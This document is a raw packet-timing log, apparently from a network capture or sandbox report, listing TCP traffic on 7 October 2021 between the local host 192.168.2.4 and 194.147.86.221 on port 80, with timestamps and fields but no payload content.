                                                          Oct 7, 2021 01:32:20.013523102 CEST4977880192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:20.013592005 CEST8049778194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:20.013607979 CEST8049778194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:20.013622999 CEST8049778194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:20.013638973 CEST8049778194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:20.013695002 CEST4977880192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:20.013695002 CEST8049778194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:20.013710976 CEST4977880192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:20.013745070 CEST8049778194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:20.013771057 CEST8049778194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:20.013794899 CEST8049778194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:20.013808966 CEST4977880192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:20.013818026 CEST8049778194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:20.013840914 CEST8049778194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:20.013858080 CEST4977880192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:20.013874054 CEST8049778194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:20.013896942 CEST8049778194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:20.013902903 CEST4977880192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:20.013921976 CEST8049778194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:20.013945103 CEST8049778194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:20.013955116 CEST4977880192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:20.013967037 CEST8049778194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:20.013991117 CEST8049778194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:20.013994932 CEST4977880192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:20.014014006 CEST8049778194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:20.014045000 CEST4977880192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:20.014087915 CEST4977880192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:20.033302069 CEST8049778194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:20.033324957 CEST8049778194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:20.033337116 CEST8049778194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:20.033349991 CEST8049778194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:20.033365965 CEST8049778194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:20.033458948 CEST4977880192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:20.044347048 CEST8049777194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:20.044392109 CEST8049777194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:20.044409037 CEST8049777194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:20.044425011 CEST8049777194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:20.044446945 CEST8049777194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:20.044461966 CEST8049777194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:20.044482946 CEST8049777194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:20.044581890 CEST4977780192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:20.044630051 CEST4977780192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:20.044641018 CEST8049777194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:20.044699907 CEST8049777194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:20.044747114 CEST8049777194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:20.044789076 CEST8049777194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:20.044838905 CEST4977780192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:20.044871092 CEST4977780192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:20.044878960 CEST4977780192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:20.044995070 CEST4977780192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:20.049719095 CEST8049777194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:20.049761057 CEST8049777194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:20.049860001 CEST4977780192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:20.051165104 CEST8049777194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:20.062318087 CEST8049778194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:20.062371016 CEST8049778194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:20.062407017 CEST8049778194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:20.062453032 CEST8049778194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:20.062496901 CEST8049778194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:20.062517881 CEST4977880192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:20.062534094 CEST8049778194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:20.062556028 CEST4977880192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:20.062561989 CEST4977880192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:20.062572956 CEST8049778194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:20.062611103 CEST8049778194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:20.062645912 CEST8049778194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:20.062661886 CEST4977880192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:20.062684059 CEST8049778194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:20.062696934 CEST4977880192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:20.062721014 CEST8049778194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:20.062767029 CEST8049778194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:20.062808990 CEST8049778194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:20.062817097 CEST4977880192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:20.062845945 CEST8049778194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:20.062869072 CEST4977880192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:20.062886000 CEST8049778194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:20.062922955 CEST8049778194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:20.062958956 CEST8049778194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:20.062968969 CEST4977880192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:20.062995911 CEST8049778194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:20.063005924 CEST4977880192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:20.063030005 CEST8049778194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:20.065000057 CEST4977880192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:20.065067053 CEST4977880192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:20.093746901 CEST8049777194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:20.093813896 CEST8049777194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:20.093868971 CEST8049777194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:20.093869925 CEST4977780192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:20.093921900 CEST8049777194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:20.093928099 CEST4977780192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:20.093949080 CEST4977780192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:20.093978882 CEST4977780192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:20.093980074 CEST8049777194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:20.094036102 CEST4977780192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:20.094041109 CEST8049777194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:20.094100952 CEST8049777194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:20.094125986 CEST4977780192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:20.094151020 CEST8049777194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:20.094152927 CEST4977780192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:20.094206095 CEST4977780192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:20.099222898 CEST8049777194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:20.099283934 CEST8049777194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:20.099394083 CEST4977780192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:20.114713907 CEST8049778194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:20.143610954 CEST8049777194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:20.143637896 CEST8049777194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:20.143657923 CEST8049777194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:20.143677950 CEST8049777194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:20.143701077 CEST4977780192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:20.143706083 CEST8049777194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:20.143733025 CEST8049777194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:20.143733978 CEST4977780192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:20.143757105 CEST4977780192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:20.143759012 CEST8049777194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:20.143800974 CEST4977780192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:20.148165941 CEST8049777194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:20.148466110 CEST4977780192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:20.192871094 CEST8049777194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:20.192926884 CEST8049777194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:20.192967892 CEST8049777194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:20.192994118 CEST4977780192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:20.193003893 CEST8049777194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:20.193072081 CEST4977780192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:20.193200111 CEST4977780192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:20.241934061 CEST8049777194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:20.775321007 CEST4977980192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:20.826149940 CEST8049779194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:20.826302052 CEST4977980192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:20.827048063 CEST4977980192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:20.833169937 CEST4978080192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:20.885941029 CEST8049780194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:20.886065006 CEST4978080192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:20.886424065 CEST4978080192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:20.918912888 CEST8049779194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:20.980824947 CEST8049780194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:21.292851925 CEST8049779194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:21.292890072 CEST8049779194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:21.293133020 CEST4977980192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:21.544200897 CEST4977980192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:21.568727970 CEST8049780194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:21.568784952 CEST8049780194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:21.568821907 CEST8049780194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:21.568861008 CEST8049780194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:21.568875074 CEST4978080192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:21.568897009 CEST8049780194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:21.568914890 CEST4978080192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:21.568938971 CEST8049780194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:21.568977118 CEST8049780194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:21.568990946 CEST4978080192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:21.569017887 CEST8049780194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:21.569056988 CEST8049780194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:21.569072008 CEST4978080192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:21.569092989 CEST8049780194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:21.569140911 CEST4978080192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:21.592881918 CEST8049779194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:21.618634939 CEST8049780194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:21.618660927 CEST8049780194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:21.618678093 CEST8049780194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:21.618695021 CEST8049780194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:21.618711948 CEST8049780194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:21.618736982 CEST8049780194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:21.618752003 CEST4978080192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:21.618794918 CEST4978080192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:21.618798971 CEST4978080192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:21.618824959 CEST8049780194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:21.618851900 CEST8049780194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:21.618870974 CEST8049780194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:21.618891001 CEST4978080192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:21.618891954 CEST8049780194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:21.618951082 CEST4978080192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:21.667849064 CEST8049780194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:21.668404102 CEST8049780194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:21.668441057 CEST8049780194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:21.668489933 CEST8049780194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:21.668533087 CEST8049780194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:21.668565035 CEST4978080192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:21.668570042 CEST8049780194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:21.668607950 CEST8049780194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:21.668637991 CEST4978080192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:21.668648005 CEST8049780194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:21.668648958 CEST4978080192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:21.668684006 CEST8049780194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:21.668720007 CEST4978080192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:21.668724060 CEST8049780194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:21.668761015 CEST8049780194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:21.668791056 CEST4978080192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:21.718566895 CEST8049780194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:21.718624115 CEST8049780194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:21.718667030 CEST8049780194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:21.718688011 CEST4978080192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:21.718703032 CEST8049780194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:21.718714952 CEST4978080192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:21.718743086 CEST8049780194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:21.718780994 CEST8049780194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:21.718786001 CEST4978080192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:21.718828917 CEST8049780194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:21.718871117 CEST8049780194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:21.718880892 CEST4978080192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:21.718909025 CEST8049780194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:21.718949080 CEST8049780194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:21.718951941 CEST4978080192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:21.767036915 CEST4978080192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:21.769186020 CEST8049780194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:21.769222021 CEST8049780194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:21.769243956 CEST8049780194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:21.769265890 CEST8049780194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:21.769284010 CEST8049780194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:21.769290924 CEST4978080192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:21.769304991 CEST8049780194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:21.769328117 CEST8049780194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:21.769349098 CEST8049780194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:21.769357920 CEST4978080192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:21.769365072 CEST4978080192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:21.769373894 CEST8049780194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:21.769412994 CEST4978080192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:21.769423008 CEST8049780194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:21.769488096 CEST4978080192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:21.769532919 CEST8049780194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:21.813895941 CEST4978080192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:21.826608896 CEST8049780194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:21.826642036 CEST8049780194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:21.826664925 CEST8049780194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:21.826689005 CEST8049780194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:21.826734066 CEST4978080192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:21.826750040 CEST8049780194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:21.826776028 CEST8049780194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:21.826800108 CEST8049780194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:21.826809883 CEST4978080192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:21.826817989 CEST8049780194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:21.826841116 CEST8049780194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:21.826862097 CEST4978080192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:21.826863050 CEST8049780194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:21.826898098 CEST8049780194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:21.826910019 CEST4978080192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:21.826927900 CEST4978080192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:21.863271952 CEST8049780194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:21.863369942 CEST4978080192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:21.875900984 CEST8049780194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:21.875931978 CEST8049780194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:21.875997066 CEST8049780194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:21.876019955 CEST8049780194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:21.876041889 CEST8049780194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:21.876041889 CEST4978080192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:21.876064062 CEST8049780194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:21.876082897 CEST4978080192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:21.876086950 CEST8049780194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:21.876111031 CEST8049780194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:21.876122952 CEST4978080192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:21.876132965 CEST8049780194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:21.876157045 CEST8049780194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:21.876183033 CEST8049780194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:21.876200914 CEST4978080192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:21.876209974 CEST4978080192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:21.912503004 CEST8049780194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:21.912545919 CEST8049780194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:21.912643909 CEST4978080192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:21.925545931 CEST8049780194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:21.925582886 CEST8049780194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:21.925605059 CEST8049780194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:21.925622940 CEST8049780194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:21.925640106 CEST8049780194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:21.925666094 CEST8049780194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:21.925684929 CEST4978080192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:21.925688028 CEST8049780194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:21.925714970 CEST8049780194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:21.925721884 CEST4978080192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:21.925728083 CEST4978080192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:21.925733089 CEST4978080192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:21.925740004 CEST8049780194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:21.925764084 CEST8049780194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:21.925796986 CEST4978080192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:21.961692095 CEST8049780194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:21.961734056 CEST8049780194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:21.961764097 CEST4978080192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:21.975244045 CEST8049780194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:21.975285053 CEST8049780194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:21.975303888 CEST8049780194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:21.975327015 CEST8049780194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:21.975349903 CEST8049780194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:21.975368023 CEST4978080192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:21.975373030 CEST8049780194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:21.975393057 CEST8049780194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:21.975414991 CEST8049780194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:21.975430012 CEST4978080192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:21.975440025 CEST8049780194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:21.975446939 CEST4978080192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:21.975505114 CEST8049780194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:21.975513935 CEST4978080192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:21.975620031 CEST8049780194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:21.975680113 CEST4978080192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:22.011742115 CEST8049780194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:22.011779070 CEST8049780194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:22.011842966 CEST4978080192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:22.026062012 CEST8049780194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:22.026103020 CEST8049780194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:22.026124001 CEST8049780194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:22.026140928 CEST8049780194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:22.026160002 CEST8049780194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:22.026180983 CEST8049780194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:22.026201010 CEST8049780194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:22.026221991 CEST8049780194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:22.026245117 CEST8049780194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:22.026262045 CEST4978080192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:22.026267052 CEST8049780194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:22.026287079 CEST8049780194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:22.026298046 CEST4978080192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:22.026307106 CEST4978080192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:22.026309013 CEST8049780194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:22.026312113 CEST4978080192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:22.026331902 CEST8049780194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:22.026362896 CEST4978080192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:22.061079025 CEST8049780194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:22.061152935 CEST8049780194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:22.065243959 CEST4978080192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:22.076000929 CEST8049780194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:22.076056957 CEST8049780194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:22.076097012 CEST8049780194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:22.076134920 CEST8049780194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:22.076172113 CEST8049780194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:22.076191902 CEST4978080192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:22.076214075 CEST4978080192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:22.076219082 CEST8049780194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:22.076227903 CEST4978080192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:22.076263905 CEST8049780194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:22.076302052 CEST8049780194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:22.076334953 CEST4978080192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:22.076339006 CEST8049780194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:22.076375961 CEST8049780194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:22.076386929 CEST4978080192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:22.076412916 CEST8049780194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:22.076457024 CEST4978080192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:22.114375114 CEST8049780194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:22.114432096 CEST8049780194.147.86.221192.168.2.4
